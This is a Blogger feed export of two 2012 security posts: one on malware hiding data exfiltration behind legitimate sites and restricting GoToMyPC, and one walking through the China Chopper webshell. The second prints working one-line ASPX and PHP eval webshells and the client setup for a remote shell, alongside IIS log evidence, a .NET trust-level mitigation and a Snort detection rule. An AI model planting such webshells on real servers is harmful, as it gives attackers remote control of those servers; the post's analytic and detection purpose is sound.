Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2139855789243746740.post-33865580033248787372012-11-24T15:29:00.001-08:002012-11-24T15:29:50.245-08:00Concealing Data Exfiltration with Youtube or Facebook<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">You've probably already read about <a href="http://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" target="_blank">Backdoor.Makadocs</a> which uses Google Docs or Google Drive as a command-and-control (C&C) server. This made quite a big stir last week, unfortunately this isn't a new trick. <a href="http://blog.eset.com/2012/06/21/acadmedre-10000s-of-autocad-files-leaked-in-suspected-industrial-espionage" target="_blank">ACAD/Medre.A</a> was created for the mass exfiltration of AutoCad files and used qq.com for transmitting files. I'm sure there are many other examples too.</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">The use of legitimate sites like Google Docs, Facebook and Youtube seem to be the obvious choice for hackers wanting to exfiltrate data. The benefit of course is the lack of IoC's from a network perspective. Could you tell the difference between someone watching a 30-minute clip or exfiltrating *.{doc,xls,dwg} files to Youtube or Facebook over SSL? There are <a href="http://keyj.emphy.de/files/tcsteg.py" target="_blank">already tools available</a> to hide TrueCrypt volumes in mp4's. Why not use Youtube or Facebook to exfiltrate data? I haven't read any incidents involving this but it's coming.</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-RSYRM2btVoE/ULFTtQNCaYI/AAAAAAAAEVo/8fBOBtTVHxY/s1600/udoob.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif; font-size: x-small;"></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-2HCyArz_g5M/ULFWRcPTNgI/AAAAAAAAEVw/h3X3RjmSpaY/s1600/udoob.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="http://1.bp.blogspot.com/-2HCyArz_g5M/ULFWRcPTNgI/AAAAAAAAEVw/h3X3RjmSpaY/s400/udoob.tiff" width="400" /></a></div>
<br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;">As companies improve there security to detected unwanted software the move to legitimate remote administration programs such as GoToMyPC, the natural path of evil doers would be to use those as well. Speaking of which, did you know you can control who uses GoToMyPC from your corporate IP space?</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<blockquote>
</blockquote>
<table border="0" cellpadding="0" cellspacing="0" class="help_pro_n_faq_qnas" style="background-color: white; font-family: arial; font-size: 12px; width: 586px;"><tbody>
<tr><td class="help_pro_n_faq_q" style="font-weight: bold;"><blockquote class="tr_bq">
"Can I block the unofficial use of GoToMyPC Pro while allowing authorized use?</blockquote>
</td></tr>
<tr><td height="8"></td></tr>
<tr><td class="help_pro_n_faq_a"><blockquote>
Yes. Through our free Authorization Management Service (AMS), GoToMyPC Pro will gladly work with you to block selected Internet-visible IPs while still enabling authorized GoToMyPC Pro account access. If you do not currently have a GoToMyPC Pro account but wish to block access by using AMS, please contact<a href="mailto:gotopro@citrixonline.com">gotopro@citrixonline.com</a>. If you are a current GoToMyPC Pro customer, please contact us at<a href="mailto:gotoaccounts@citrixonline.com">gotoaccounts@citrixonline.com</a>."</blockquote>
If your company has a policy against using GoToMyPC (and no way to enforce it) you should probably work with Citrix to restrict access. If your company allows it, you should really restrict authorized accounts.<br />
<br />
Keith</td></tr>
</tbody></table>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2139855789243746740.post-12835636081817741702012-11-16T15:00:00.000-08:002012-11-16T17:19:58.566-08:00China Chopper Webshell - the 4KB that Owns your Web Server<br />
<br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;">I've been wanting to blog about China Chopper for sometime and finally got around to it. When I first started researching this webshell I was unable to find anything about how to set it up and configure it. In this post I'll go over the components of China Chopper as well as setting it up.</span><br />
<br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;">China Chopper is a webshell used to remotely access Windows or Linux servers. It is malicious software used by the bad guys. Given the name China Chopper it is developed in China and used heavily by Chinese hackers.</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">The software is hosted on </span><span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;">maicaidao.com, which I might mention has recently changed.</span> </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-na8MgS7drFQ/UKayiwVEEiI/AAAAAAAAEUY/iDqJqQxafO4/s1600/maicaido.comWhois.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://1.bp.blogspot.com/-na8MgS7drFQ/UKayiwVEEiI/AAAAAAAAEUY/iDqJqQxafO4/s320/maicaido.comWhois.tiff" width="301" /></a></div>
<br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;">The webshell consists mainly of two parts, the client interface (caidao.exe) and the file placed on the compromised web server. </span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Here are the files included with the download & MD5's.</span><br />
<span style="font-family: Verdana, sans-serif;"><b><br /></b></span>
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;">caidao.exe 5001ef50c7e869253a7c152a638eab8a</span></span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><b>CCC</b></span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"></span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> aspRwWithJMail.ccc a6d6cbfa2ead1d0e8a6735aa49b963ff</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> aspSpy.ccc be207c46105c38571ae958ae2da47297</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> aspx.ccc cc07ac4caef188334fc330f62e0a574a</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> php.ccc 9100b18660f3a1eeca7ea801b357b8ce</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> phpSpy.ccc ce1a9fc93040d5c94f789b579fe1c106</span><br />
<br />
<span style="font-family: Verdana, sans-serif;"><b><span style="font-size: x-small;"><br /></span></b></span>
<span style="font-family: Verdana, sans-serif;"><b><span style="font-size: x-small;">Customize</span></b></span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"> Customize.cfm ad8288227240477a95fb023551773c84</span><br />
<span style="font-size: x-small;"><span style="font-family: Verdana, sans-serif;"> Customize.jsp acba8115d027529763ea5c7ed6621499</span><span style="font-family: Verdana, sans-serif;"> </span><span style="font-family: Verdana, sans-serif;"> </span></span><br />
<br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;">The file dropped on the compromised server is nice and small. The client, caidao.exe communicates directly with the file.</span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"></span><br />
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Servers running IIS, place the contents below in a file called webshell.aspx</span><br />
<div style="text-align: center;">
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;"><%@ Page Language="Jscript"%><%eval(Request.Item[”password"],"unsafe");%></span></span></div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Servers running Apache with PHP, place the contents in a file call webshell.php</span><br />
<div style="text-align: center;">
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;"><?php @eval($_POST['password']);?></span></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Next, open caidao.exe</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><a href="http://4.bp.blogspot.com/-dqS4CC4PMYw/UKa7Brw2mRI/AAAAAAAAEUo/yj2UAFgkn9c/s1600/CCOpened.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://4.bp.blogspot.com/-dqS4CC4PMYw/UKa7Brw2mRI/AAAAAAAAEUo/yj2UAFgkn9c/s320/CCOpened.tiff" width="320" /></a></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">You will see examples already listed referencing maicaidao.com. Lets add in the information to communicate with our test compromised Windows 2008 R2 server using the webshell.aspx file mentioned above.</span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Right-click and select add, you will see the following dialog box</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><a href="http://2.bp.blogspot.com/-RjGVJ6CJP0I/UKa8RaiEOkI/AAAAAAAAEUw/OhWDXyErtLM/s1600/CCconfig.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="http://2.bp.blogspot.com/-RjGVJ6CJP0I/UKa8RaiEOkI/AAAAAAAAEUw/OhWDXyErtLM/s320/CCconfig.tiff" width="320" /></a></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Address field is the URL to the file on the compromised server. The next field acts as a password of sort, if this doesn't match the contents in the webshell.aspx file it won't work.</span></div>
<div>
<div style="text-align: center;">
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;"><%@ Page Language="Jscript"%><%eval(Request.Item[”<b>password</b>"],"unsafe");%></span></span></div>
<div style="text-align: center;">
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Change the file type to match ASPX and change the codepage to UTF-8. </span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Click 'Edit' to save your changes. To open up a remote shell, right-click on the entry and select 'Virtual Terminal'. If everything was correctly you will see the following command interface.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><a href="http://4.bp.blogspot.com/-XssN0vGvG-c/UKa-1Fy9sPI/AAAAAAAAEVA/65t6WsrLr6U/s1600/Untitled.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="http://4.bp.blogspot.com/-XssN0vGvG-c/UKa-1Fy9sPI/AAAAAAAAEVA/65t6WsrLr6U/s320/Untitled.tiff" width="320" /></a></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;">I should note that this works on a fully patched and default configuration of Windows 2008 R2 web server role. Primarily because .NET by default has full control, if you change it to 'High' China Chopper (and many other) webshell will not work.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><a href="http://2.bp.blogspot.com/-L0Dk1D-xnqs/UKa_6btcVyI/AAAAAAAAEVI/2bB2EHfv3AM/s1600/IIS+NET+Trust+Levels.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="http://2.bp.blogspot.com/-L0Dk1D-xnqs/UKa_6btcVyI/AAAAAAAAEVI/2bB2EHfv3AM/s320/IIS+NET+Trust+Levels.tiff" width="320" /></a></span></div>
<div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;">When the webshell is executing commands you will see the following with Process Explorer</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><a href="http://1.bp.blogspot.com/-2qrdXYlsZrw/UKbAZuyjQLI/AAAAAAAAEVQ/ZUQWdSA-RrE/s1600/procExp.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="http://1.bp.blogspot.com/-2qrdXYlsZrw/UKbAZuyjQLI/AAAAAAAAEVQ/ZUQWdSA-RrE/s640/procExp.tiff" width="640" /></a></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;"><br /></span></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;">IIS logs will show only a post to the file, here is a line copied from the IIS log</span></span></div>
<div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="font-size: xx-small;">2012-11-16 22:30:14 172.16.192.137 POST /webshell.aspx - 80 - 172.16.192.140 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 200 0 0 31</span></span></div>
<div style="font-size: small;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div style="font-size: small;">
<span style="font-family: Verdana, sans-serif;">The traffic is base64 encoded, here is a snipit from Wireshark during a post of the initial connection and sending the netstat command.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-xjKIBYXWObk/UKbB8wBqtRI/AAAAAAAAEVY/5ajCLOi_joU/s1600/wires.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://3.bp.blogspot.com/-xjKIBYXWObk/UKbB8wBqtRI/AAAAAAAAEVY/5ajCLOi_joU/s400/wires.tiff" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: x-small;">There are many ways to protect against this so I won't go into that, however it would be a good idea to do some Splunking on http posts! If you don't have Splunk you could use snort to monitor for this with a simple rule to watch for base64_decode and POST.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: x-small;">I put this together really quick as a proof of concept so no consideration was put into performance. Snort might already have much better rules in place to detect base64 in http traffic.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: xx-small;">alert tcp any any -> any 80 ( sid:900001; content:"base64_decode"; http_client_body;flow:to_server,established; content:"POST"; nocase;http_method; ;msg:"Webshell Detected Apache";)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">I hope this post has informative and helped you out. If you have any questions, please feel free to contact me.</span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Keith</span></div>
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span>Unknownnoreply@blogger.com